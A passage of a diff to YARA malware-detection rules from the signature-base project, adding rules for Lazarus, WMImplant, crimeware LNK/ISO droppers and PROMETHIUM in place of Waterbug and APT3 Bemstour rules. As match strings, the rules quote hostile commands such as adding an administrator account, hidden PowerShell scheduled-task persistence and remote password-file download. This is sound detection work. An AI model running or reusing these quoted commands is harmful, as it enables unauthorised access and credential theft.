+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L295-L318"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a854926a4a98eb1d13a582b4ff4504b9740b8bbe7aa6b5192aeb4d2438a58926"
+		logic_hash = "b0aad1c8dfc07ae3df835ae113bd02abfd706a0646ffcac5dd5691822016d31a"
 		score = 75
-		quality = 35
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11"
 
 	strings:
-		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/
-		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
+		$x1 = "strNetUse = \"cmd.exe /c net use \\\\\" & host" fullword ascii
+		$x2 = "localcmd = \"cmd.exe /c \" & command " ascii
+		$x3 = "& \" > \" & TempFile & \" 2>&1\"  '2>&1 err" fullword ascii
+		$x4 = "strExec = \"cmd.exe /c \" & cmd & \" >> \" & resultfile & \" 2>&1\"  '2>&1 err" fullword ascii
+		$x5 = "TempFile = objShell.ExpandEnvironmentStrings(\"%TEMP%\") & \"\\wmi.dll\"" fullword ascii
+		$a1 = "WMIEXEC ERROR: Command -> " ascii
+		$a2 = "WMIEXEC : Command result will output to" fullword ascii
+		$a3 = "WMIEXEC : Target ->" fullword ascii
+		$a4 = "WMIEXEC : Login -> OK" fullword ascii
+		$a5 = "WMIEXEC : Process created. PID:" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x46445025 and #a > 150 and #b > 200
+		( filesize < 40KB and 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Dll
+rule SIGNATURE_BASE_Lazarus_Dec_17_1 : FILE
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
-		author = "Symantec Security Response"
-		id = "2aae09a3-6e59-5951-941e-c1f82aada979"
-		date = "2015-01-22"
+		description = "Detects Lazarus malware from incident in Dec 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f195ebf0-d7af-58e8-a544-769a0c8b628b"
+		date = "2017-12-20"
 		modified = "2023-12-05"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L17-L32"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f29ff81d62bd6bea776aeddc0725b034624f836c234441f63a8b697e959d3f8d"
+		logic_hash = "50ff8418cf342147a81ef3a418e5e61d42f0e5764982e43b51d4dd3a983a548e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d5f9a81df5061c69be9c0ed55fba7d796e1a8ebab7c609ae437c574bd7b30b48"
 
 	strings:
-		$string1 = "/%s?rank=%s"
-		$string2 = "ModuleStart\x00ModuleStop\x00start"
-		$string3 = "1156fd22-3443-4344-c4ffff"
-		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
+		$s1 = "::DataSpace/Storage/MSCompressed/Transform/" ascii
+		$s2 = "HHA Version 4." ascii
+		$s3 = { 74 45 58 74 53 6F 66 74 77 61 72 65 00 41 64 6F
+              62 65 20 49 6D 61 67 65 52 65 61 64 79 71 }
+		$s4 = "bUEeYE" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5449 and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core : FILE
+rule SIGNATURE_BASE_Lazarus_Dec_17_2 : FILE
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
-		author = "Symantec Security Response"
-		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
-		date = "2015-01-22"
-		modified = "2023-01-27"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L34-L48"
+		description = "Detects Lazarus malware from incident in Dec 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "45127fb5-0f70-5140-acd9-46147d365dfe"
+		date = "2017-12-20"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "59e1363225b1f7765e953e3d6803270b82f4268431d92ef00ed1010df0793e5f"
+		logic_hash = "273cd54a0c3ecf53893de0ef9c41d784725eea6cc843e04df01cd8f29d61a797"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cbebafb2f4d77967ffb1a74aac09633b5af616046f31dddf899019ba78a55411"
+		hash2 = "9ca3e56dcb2d1b92e88a0d09d8cab2207ee6d1f55bada744ef81e8b8cf155453"
 
 	strings:
-		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
-		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
-		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04}
-		$code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
+		$s1 = "SkypeSetup.exe" fullword wide
+		$s2 = "%s\\SkypeSetup.exe" fullword ascii
+		$s3 = "Skype Technologies S.A." fullword wide
+		$a1 = "Microsoft Code Signing PCA" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $code1 or $code2 ) or ( $code3 and $code4 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( all of ( $s* ) and not $a1 )
 }
-rule SIGNATURE_BASE_Waterbug_Turla_Dropper
+rule SIGNATURE_BASE_Lazarus_Dec_17_4 : FILE
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
-		author = "Symantec Security Response"
-		id = "f9683ac7-36f3-5a2a-8b76-e8e2527f4e0d"
-		date = "2015-01-22"
+		description = "Detects Lazarus malware from incident in Dec 2017ithumb.js"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fbdc6287-c177-53b5-83dd-979936f65192"
+		date = "2017-12-20"
 		modified = "2023-12-05"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L50-L62"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L53-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6836b8d28fb41d9459f24d22e3c428b022b26885b7dce1caa5b0d5a7a1b7f82b"
+		logic_hash = "70801347699d339cb47cad03ec3f694b09a976e32b70052a97fade09fcac679d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ff100ca86cb62117f1290e71d5f9c0519661d6c955d9fcfb71f0bbdf75b51b3"
+		hash2 = "7975c09dd436fededd38acee9769ad367bfe07c769770bd152f33a10ed36529e"
 
 	strings:
-		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
-		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
+		$s1 = "var _0xf5ed=[\"\\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2E\\x53\\x68\\x65\\x6C\\x6C\"," ascii
 
 	condition:
-		all of them
+		filesize < 9KB and 1 of them
 }
-rule SIGNATURE_BASE_Waterbug_Fa_Malware : FILE
+rule SIGNATURE_BASE_Lazarus_Dec_17_5 : FILE
 {
 	meta:
-		description = "Symantec Waterbug Attack - FA malware variant"
-		author = "Symantec Security Response"
-		id = "b09f798a-2875-59ca-b880-971d8f973c76"
-		date = "2015-01-22"
-		modified = "2023-01-27"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L64-L81"
+		description = "Detects Lazarus malware from incident in Dec 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "33bd8c08-123e-5a8e-b5dc-02af7291addc"
+		date = "2017-12-20"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L69-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b3ac0d69551f27c7f81e24eb00e110639d4b31c8581dfee82715d65528b09632"
+		logic_hash = "480ec19f7050d34713ed621ae9ec5d5463b1cc4710b473465cc78e533796d2e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471"
 
 	strings:
-		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
-		$string2 = "d:\\proj\\cn\\fa64\\"
-		$string3 = "sengoku_Win32.sys\x00"
-		$string4 = "rk_ntsystem.c"
-		$string5 = "\\uroboros\\"
-		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
+		$x1 = "$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList" fullword ascii
+		$x2 = "$respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;" fullword ascii
+		$x3 = "[String]$PS_PATH = \"C:\\\\Users\\\\Public\\\\Documents\\\\ProxyAutoUpdate.ps1\";" fullword ascii
+		$x4 = "$cmdSchedule = 'schtasks /create /tn \"ProxyServerUpdater\"" ascii
+		$x5 = "/tr \"powershell.exe -ep bypass -windowstyle hidden -file " ascii
+		$x6 = "C:\\\\Users\\\\Public\\\\Documents\\\\tmp' + -join " ascii
+		$x7 = "$cmdResult = cmd.exe /c $cmdInst | Out-String;" fullword ascii
+		$x8 = "whoami /groups | findstr /c:\"S-1-5-32-544\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $string* ) )
+		filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_Waterbug_Sav : FILE
+rule SIGNATURE_BASE_Wmimplant
 {
 	meta:
-		description = "Symantec Waterbug Attack - SAV Malware"
-		author = "Symantec Security Response"
-		id = "685849de-9892-56bf-8215-21b08d8b2d7c"
-		date = "2015-01-22"
-		modified = "2023-01-27"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L114-L129"
+		description = "Auto-generated rule - file WMImplant.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "18dadc55-e12f-5c4c-9e11-27dc2d6c8dd2"
+		date = "2017-03-24"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_wmi_implant.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8622ac6cb1f0b9965fe6ee1a4860f19d8b0dc1c586e2a3771420b8d78648066"
+		logic_hash = "6422514d25b723e7ab92c1af1301e51d9a93aa41da98791d96c4754a91b5a18e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78"
 
 	strings:
-		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
-		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
-		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
-		$code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
+		$x1 = "Invoke-ProcessPunisher -Creds $RemoteCredential" fullword ascii
+		$x2 = "$Target -query \"SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')" ascii
+		$x3 = "WMImplant -Creds" fullword ascii
+		$x4 = "-Download -RemoteFile C:\\passwords.txt" ascii
+		$x5 = "-Command 'powershell.exe -command \"Enable-PSRemoting" fullword ascii
+		$x6 = "Invoke-WMImplant" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $code1a or $code1b or $code1c ) and $code2 )
+		1 of them
 }
-rule SIGNATURE_BASE_Apt3_Bemstour_Strings : FILE
+rule SIGNATURE_BASE_MAL_CRIME_Suspicious_Hex_String_Jun21_1 : CRIME PE FILE
 {
 	meta:
-		description = "Detects strings used by the Bemstour exploitation tool"
-		author = "Mark Lechtik"
-		id = "8b76e10a-040f-505e-9dff-cd0a689b121e"
-		date = "2019-06-25"
-		modified = "2023-12-04"
+		description = "Triggers on parts of a big hex string available in lots of crime'ish PE files."
+		author = "Nils Kuhnert"
+		id = "2ad208fa-c7a5-5df9-96fe-4a84dc770f0f"
+		date = "2021-06-04"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt3_bemstour.yar#L1-L64"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_crime_unknown.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
-		logic_hash = "8aa7491b1dc3595f67ae1229d33f79261616b0f27485b7a27705db63a6111c07"
-		score = 75
-		quality = 60
-		tags = "FILE"
-		company = "Check Point Software Technologies LTD."
+		logic_hash = "73144b14f3aa1a1d82df7710fa47049426bfbddeef75e85c8a0a559ad6ed05a3"
+		score = 65
+		quality = 85
+		tags = "CRIME, PE, FILE"
+		hash1 = "37d60eb2daea90a9ba275e16115848c95e6ad87d20e4a94ab21bd5c5875a0a34"
+		hash2 = "3380c8c56d1216fe112cbc8f1d329b59e2cd2944575fe403df5e5108ca21fc69"
+		hash3 = "cd283d89b1b5e9d2875987025009b5cf6b137e3441d06712f49e22e963e39888"
+		hash4 = "404efa6fb5a24cd8f1e88e71a1d89da0aca395f82d8251e7fe7df625cd8e80aa"
+		hash5 = "479bf3fb8cff50a5de3d3742ab4b485b563b8faf171583b1015f80522ff4853e"
 
 	strings:
-		$dbg_print_1 = "leaked address is 0x%llx" ascii wide
-		$dbg_print_2 = "========== %s ==========" ascii wide
-		$dbg_print_3 = "detailVersion:%d" ascii wide
-		$dbg_print_4 = "create pipe twice failed" ascii wide
-		$dbg_print_5 = "WSAStartup function failed with error: %d" ascii wide
-		$dbg_print_6 = "can't open input file." ascii wide
-		$dbg_print_7 = "Allocate Buffer Failed." ascii wide
-		$dbg_print_8 = "Connect to target failed." ascii wide
-		$dbg_print_9 = "connect successful." ascii wide
-		$dbg_print_10 = "not supported Platform" ascii wide
-		$dbg_print_11 = "Wait several seconds." ascii wide
-		$dbg_print_12 = "not set where to write ListEntry ." ascii wide
-		$dbg_print_13 = "backdoor not installed." ascii wide
-		$dbg_print_14 = "REConnect to target failed." ascii wide
-		$dbg_print_15 = "Construct TreeConnectAndX Request Failed." ascii wide
-		$dbg_print_16 = "Construct NTCreateAndXRequest  Failed." ascii wide
-		$dbg_print_17 = "Construct Trans2  Failed." ascii wide
-		$dbg_print_18 = "Construct ConsWXR  Failed." ascii wide
-		$dbg_print_19 = "Construct ConsTransSecondary  Failed." ascii wide
-		$dbg_print_20 = "if you don't want to input password , use server2003 version.." ascii wide
-		$cmdline_1 = "Command format  %s TargetIp domainname username password 2" ascii wide
-		$cmdline_2 = "Command format  %s TargetIp domainname username password 1" ascii wide
-		$cmdline_3 = "cmd.exe /c net user test test /add && cmd.exe /c net localgroup administrators test /add" ascii wide
-		$cmdline_4 = "hello.exe  \"C:\\WINDOWS\\DEBUG\\test.exe\"" ascii wide
-		$cmdline_5 = "parameter not right" ascii wide
-		$smb_param_1 = "browser" ascii wide
-		$smb_param_2 = "spoolss" ascii wide
-		$smb_param_3 = "srvsvc" ascii wide
-		$smb_param_4 = "\\PIPE\\LANMAN" ascii wide
-		$smb_param_5 = "Werttys for Workgroups 3.1a" ascii wide
-		$smb_param_6 = "PC NETWORK PROGRAM 1.0" ascii wide
-		$smb_param_7 = "LANMAN1.0" ascii wide
-		$smb_param_8 = "LM1.2X002" ascii wide
-		$smb_param_9 = "LANMAN2.1" ascii wide
-		$smb_param_10 = "NT LM 0.12" ascii wide
-		$smb_param_12 = "WORKGROUP" ascii wide
-		$smb_param_13 = "Windows Server 2003 3790 Service Pack 2" ascii wide
-		$smb_param_14 = "Windows Server 2003 5.2" ascii wide
-		$smb_param_15 = "Windows 2002 Service Pack 2 2600" ascii wide
-		$smb_param_16 = "Windows 2002 5.1" ascii wide
-		$smb_param_17 = "PC NETWORK PROGRAM 1.0" ascii wide
-		$smb_param_18 = "Windows 2002 5.1" ascii wide
-		$smb_param_19 = "Windows for Workgroups 3.1a" ascii wide
-		$unique_str_1 = "WIN-NGJ7GKNROVS"
-		$unique_str_2 = "XD-A31C2E0087B2"
+		$a1 = "07032114130C0812141104170C0412147F6A6A0C041F321104130C0412141104030C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141122130C0412146423272A711221112B1C042734170408622513143D20262B0F323038692B312003271C170B3A2F286623340610241F001729210579223202642200087C071C17742417020620141462060F12141104130C0412141214001C0412011100160C0C002D2412130C0412141104130C04121A11041324001F140122130C0134171" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $dbg_print* ) or 2 of ( $cmdline* ) or 1 of ( $unique_str* ) ) and 3 of ( $smb_param* )
+		uint16( 0 ) == 0x5a4d and filesize < 10MB and all of them
 }
-rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Byte_Patch
+rule SIGNATURE_BASE_MAL_CRIME_Unknown_LNK_Jun21_1 : LNK POWERSHELL FILE
 {
 	meta:
-		description = "Detects an implant used by Bemstour exploitation tool (APT3)"
-		author = "Mark Lechtik"
-		id = "c30434c3-8949-566c-b6a6-29bffdaf961d"
-		date = "2019-06-25"
-		modified = "2023-12-04"
+		description = "Triggers on malicious link files which calls powershell with an obfuscated payload and downloads an HTA file."
+		author = "Nils Kuhnert"
+		id = "d1aac420-fd91-5577-8efd-fcdd7f733981"
+		date = "2021-06-04"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt3_bemstour.yar#L69-L104"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_crime_unknown.yar#L18-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
-		logic_hash = "08de2c885ccb24cb247efdcc06bbcbea144d652744b2d38aaa2aabfd341e4f91"
+		logic_hash = "460e764cbd9fbfa1a2156059d0042a0bea5a939d501050a733a789d236015d37"
 		score = 75
 		quality = 85
-		tags = ""
-		company = "Check Point Software Technologies LTD."
+		tags = "LNK, POWERSHELL, FILE"
+		hash1 = "8fc7f25da954adcb8f91d5b0e1967e4a90ca132b280aa6ae73e150b55d301942"
+		hash2 = "f5da192f4e4dfb6b728aee1821d10bec6d68fb21266ce32b688e8cae7898a522"
+		hash3 = "183a9b3c04d16a1822c788d7a6e78943790ee2cdeea12a38e540281091316e45"
+		hash4 = "a38c6aa3e1c429a27226519b38f39f03b0b1b9d75fd43cd7e067c5e542967afe"
+		hash5 = "455f7b6b975fb8f7afc6295ec40dae5696f5063d1651f3b2477f10976a3b67b2"
 
 	strings:
-		$chunk_1 = {
-
-C7 45 ?? 55 8B EC 83
-C7 45 ?? EC 74 53 56
-C7 45 ?? 8B 75 08 33
-C7 45 ?? C9 57 C7 45
-C7 45 ?? 8C 4C 6F 61
-
-}
+		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x004c and all of them
 }
-rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Command_Stack_Variable
+rule SIGNATURE_BASE_MAL_CRIME_Unknown_ISO_Jun21_1 : ISO POWERSHELL LNK FILE
 {
 	meta:
-		description = "Detecs an implant used by Bemstour exploitation tool (APT3)"
-		author = "Mark Lechtik"
-		id = "c773da5a-2d3f-5a0a-af2e-28ad382622b3"
-		date = "2019-06-25"
-		modified = "2023-12-04"
+		description = "Triggers on ISO files that mimick NOBELIUM TTPs, but uses LNK files that call powershell instead."
+		author = "Nils Kuhnert"
+		id = "73a1fc44-45c4-5253-b81d-fa6686dc0644"
+		date = "2021-06-04"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt3_bemstour.yar#L107-L275"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_crime_unknown.yar#L35-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
-		logic_hash = "36710db313a52db2a0c0af356e701d3a36e5597203e87fd7f8586d202738be33"
+		logic_hash = "49b61f498d3f4ee249d9687277e581a39e08ebb4e1a293170058fb5f770bde1f"
 		score = 75
 		quality = 85
-		tags = ""
-		company = "Check Point Software Technologies LTD."
+		tags = "ISO, POWERSHELL, LNK, FILE"
+		hash1 = "425dbed047dd2ce760d0848ebf7ad04b1ca360f111d557fc7bf657ae89f86d36"
+		hash2 = "f6944b6bca627e219d9c5065f214f95eb2226897a3b823b645d0fd78c281b149"
+		hash3 = "14d70a8bdd64e9a936c2dc9caa6d4506794505e0e3870e3a25d9d59bcafb046e"
+		hash4 = "9b2ca8eb6db34b07647a74171a5ff4c0a2ca8000da9876ed2db6361958c5c080"
 
 	strings:
-		$chunk_1 = {
-
-C7 85 ?? ?? ?? ?? 63 6D 64 2E
-C7 85 ?? ?? ?? ?? 65 78 65 20
-C7 85 ?? ?? ?? ?? 2F 63 20 63
-C7 85 ?? ?? ?? ?? 6F 70 79 20
-C7 85 ?? ?? ?? ?? 25 77 69 6E
-C7 85 ?? ?? ?? ?? 64 69 72 25
-C7 85 ?? ?? ?? ?? 5C 73 79 73
-C7 85 ?? ?? ?? ?? 74 65 6D 33
-C7 85 ?? ?? ?? ?? 32 5C 63 6D
-C7 85 ?? ?? ?? ?? 64 2E 65 78
-C7 85 ?? ?? ?? ?? 65 20 25 77
-C7 85 ?? ?? ?? ?? 69 6E 64 69
-C7 85 ?? ?? ?? ?? 72 25 5C 73
-C7 85 ?? ?? ?? ?? 79 73 74 65
-C7 85 ?? ?? ?? ?? 6D 33 32 5C
-C7 85 ?? ?? ?? ?? 73 65 74 68
-C7 85 ?? ?? ?? ?? 63 2E 65 78
-C7 85 ?? ?? ?? ?? 65 20 2F 79
-83 A5 ?? ?? ?? ?? 00
-}
-		$chunk_2 = {
-
-C7 85 ?? ?? ?? ?? 63 6D 64 20
-C7 85 ?? ?? ?? ?? 2F 63 20 22
-C7 85 ?? ?? ?? ?? 6E 65 74 20
-C7 85 ?? ?? ?? ?? 75 73 65 72
-C7 85 ?? ?? ?? ?? 20 63 65 73
-C7 85 ?? ?? ?? ?? 73 75 70 70
-C7 85 ?? ?? ?? ?? 6F 72 74 20
-C7 85 ?? ?? ?? ?? 31 71 61 7A
-C7 85 ?? ?? ?? ?? 23 45 44 43
-C7 85 ?? ?? ?? ?? 20 2F 61 64
-C7 85 ?? ?? ?? ?? 64 20 26 26
-C7 85 ?? ?? ?? ?? 20 6E 65 74
-C7 85 ?? ?? ?? ?? 20 6C 6F 63
-C7 85 ?? ?? ?? ?? 61 6C 67 72
-C7 85 ?? ?? ?? ?? 6F 75 70 20
-C7 85 ?? ?? ?? ?? 61 64 6D 69
-C7 85 ?? ?? ?? ?? 6E 69 73 74
-C7 85 ?? ?? ?? ?? 72 61 74 6F
-C7 85 ?? ?? ?? ?? 72 73 20 63
-C7 85 ?? ?? ?? ?? 65 73 73 75
-C7 85 ?? ?? ?? ?? 70 70 6F 72
-C7 85 ?? ?? ?? ?? 74 20 2F 61
-C7 85 ?? ?? ?? ?? 64 64 22 00
-6A 5C
+		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
+		$magic = "CD001" ascii
 
+	condition:
+		filesize < 5MB and all of them
 }
-		$chunk_3 = {
-
-C7 45 ?? 57 69 6E 45
-C7 45 ?? 78 65 63 00
-C7 45 ?? 47 65 74 50
-C7 45 ?? 72 6F 63 41
-C7 45 ?? 64 64 72 65
-C7 45 ?? 73 73 00 00
-C7 45 ?? 43 72 65 61
-C7 45 ?? 74 65 46 69
-C7 45 ?? 6C 65 41 00
-C7 45 ?? 57 72 69 74
-C7 45 ?? 65 46 69 6C
-C7 45 ?? 65 00 00 00
-C7 45 ?? 43 6C 6F 73
-C7 45 ?? 65 48 61 6E
-C7 45 ?? 64 6C 65 00
-89 4D ??
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_1 : FILE
+{
+	meta:
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21e858b1-2cfa-5757-96f0-7c44a5da6898"
+		date = "2016-12-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L10-L27"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "143e52eedc5c3be9bbf0f916b232de26e4ed5c7e81e3f77cae70e6af84d31de1"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e12031da58c0b08e8b610c3786ca2b66fcfea8ddc9ac558d08a29fd27e95a3e7"
 
-}
+	strings:
+		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
+		$s2 = "c:\\windows\\temp\\TrueCrypt-Setup-7.1a-tamindir.exe" fullword wide
+		$s3 = "%s\\ssleay32.dll" fullword wide
